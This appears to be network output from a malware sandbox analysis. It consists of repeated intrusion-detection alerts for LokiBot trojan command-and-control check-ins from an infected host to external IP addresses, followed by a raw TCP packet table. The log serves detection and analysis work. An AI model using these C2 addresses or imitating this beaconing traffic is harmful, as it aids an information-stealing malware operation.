                        02/10/22-10:22:27.690157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22172.67.197.66
                        02/10/22-10:22:27.690157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22172.67.197.66
                        02/10/22-10:22:29.085941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22172.67.197.66
                        02/10/22-10:22:30.799655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22172.67.197.66
                        02/10/22-10:22:31.879954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22172.67.197.66
                        02/10/22-10:22:32.951127TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22172.67.197.66
                        02/10/22-10:22:34.006464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22172.67.197.66
                        02/10/22-10:22:35.055713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22172.67.197.66
                        02/10/22-10:22:36.072598TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22172.67.197.66
                        02/10/22-10:22:37.120242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22172.67.197.66
                        02/10/22-10:22:38.172977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22172.67.197.66
                        02/10/22-10:22:39.224650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22172.67.197.66
                        02/10/22-10:22:40.420565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22104.21.49.244
                        02/10/22-10:22:40.420565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22104.21.49.244
                        02/10/22-10:22:40.420565TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22104.21.49.244
                        02/10/22-10:22:40.420565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22104.21.49.244
                        02/10/22-10:22:41.439397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22104.21.49.244
                        02/10/22-10:22:42.534000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22172.67.197.66
                        02/10/22-10:22:42.534000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22172.67.197.66
                        02/10/22-10:22:42.534000TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22172.67.197.66
                        02/10/22-10:22:42.534000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22172.67.197.66
                        02/10/22-10:22:43.544900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22172.67.197.66
                        02/10/22-10:22:44.584138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22172.67.197.66
                        02/10/22-10:22:45.641461TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22104.21.49.244
                        02/10/22-10:22:45.641461TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22104.21.49.244
                        02/10/22-10:22:45.641461TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22104.21.49.244
                        02/10/22-10:22:45.641461TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22104.21.49.244
                        02/10/22-10:22:46.729666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22172.67.197.66
                        02/10/22-10:22:46.729666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22172.67.197.66
                        02/10/22-10:22:46.729666TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22172.67.197.66
                        02/10/22-10:22:46.729666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22172.67.197.66
                        02/10/22-10:22:47.737186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22172.67.197.66
                        02/10/22-10:22:48.837397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22172.67.197.66
                        02/10/22-10:22:49.900199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22172.67.197.66
                        02/10/22-10:22:51.041533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22172.67.197.66
                        02/10/22-10:22:52.063120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22104.21.49.244
                        02/10/22-10:22:52.063120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22104.21.49.244
                        02/10/22-10:22:52.063120TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22104.21.49.244
                        02/10/22-10:22:52.063120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22104.21.49.244
                        02/10/22-10:22:53.153615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22172.67.197.66
                        02/10/22-10:22:53.153615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22172.67.197.66
                        02/10/22-10:22:53.153615TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22172.67.197.66
                        02/10/22-10:22:53.153615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22172.67.197.66
                        02/10/22-10:22:54.210618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22172.67.197.66
                        02/10/22-10:22:55.222618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22172.67.197.66
                        02/10/22-10:22:56.235040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22172.67.197.66
                        02/10/22-10:22:57.354640TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22172.67.197.66
                        02/10/22-10:22:58.437792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22172.67.197.66
                        02/10/22-10:22:59.543743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22172.67.197.66
                        02/10/22-10:23:00.557397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22172.67.197.66
                        02/10/22-10:23:01.628313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22172.67.197.66
                        02/10/22-10:23:02.628100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22172.67.197.66
                        02/10/22-10:23:03.670597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22104.21.49.244
                        02/10/22-10:23:03.670597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22104.21.49.244
                        02/10/22-10:23:03.670597TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22104.21.49.244
                        02/10/22-10:23:03.670597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22104.21.49.244
                        02/10/22-10:23:04.661405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22104.21.49.244
                        02/10/22-10:23:05.954620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22172.67.197.66
                        02/10/22-10:23:05.954620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22172.67.197.66
                        02/10/22-10:23:05.954620TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22172.67.197.66
                        02/10/22-10:23:05.954620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22172.67.197.66
                        02/10/22-10:23:08.596978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22172.67.197.66
                        02/10/22-10:23:10.711121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22172.67.197.66
                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                        Feb 10, 2022 10:21:50.844372988 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844379902 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844393015 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844403028 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844412088 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844413042 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844428062 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844436884 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844444990 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844458103 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844475031 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844477892 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844490051 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844501019 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844516039 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844521999 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844538927 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844544888 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844563961 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844567060 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844575882 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844587088 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844609976 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844616890 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844630957 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844634056 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844645977 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844651937 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844664097 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844674110 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844685078 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844696999 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844719887 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844721079 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844733953 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844743967 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844750881 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844765902 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.844779968 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.844798088 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.845065117 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.948957920 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.948992968 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949007988 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949023008 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949045897 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949068069 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949086905 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949106932 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949107885 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949127913 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949139118 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949141979 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949143887 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949147940 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949162960 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949172020 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949179888 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949194908 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949214935 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949215889 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949232101 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949239016 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949250937 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949278116 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949467897 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949491024 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.949513912 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.949528933 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954576015 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954602003 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954622984 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954644918 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954665899 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954677105 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954687119 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954699039 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954700947 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954709053 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954719067 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954731941 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954751015 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954756975 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954766989 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954782009 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954797983 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954802990 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954814911 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954827070 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954840899 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954849005 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954869032 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954874039 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954885006 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954895973 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954912901 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954916954 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954929113 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954937935 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954957008 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954957962 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954972029 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.954981089 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.954998970 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955002069 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955012083 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955024004 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955039978 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955044985 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955054998 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955065966 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955080986 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955086946 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955096960 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955108881 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955128908 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955128908 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955142975 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955149889 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955161095 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955173016 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955188990 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955194950 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.955208063 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.955218077 CET8049165198.46.132.195192.168.2.22
